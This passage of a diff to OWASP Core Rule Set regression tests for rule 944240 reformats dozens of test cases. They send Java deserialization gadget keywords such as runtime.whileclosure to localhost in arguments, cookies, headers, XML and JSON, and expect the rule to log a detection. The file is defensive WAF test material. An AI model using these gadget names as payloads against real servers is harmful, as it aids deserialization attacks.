log_contains: "id \"944240\"" + - test_id: 59 desc: "Cookie name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - 
test_title: 944240-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id 
\"944240\"" + - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 75 desc: 
"Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-79 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
test=runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 84 desc: "XML element value includes keyword 
runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + 
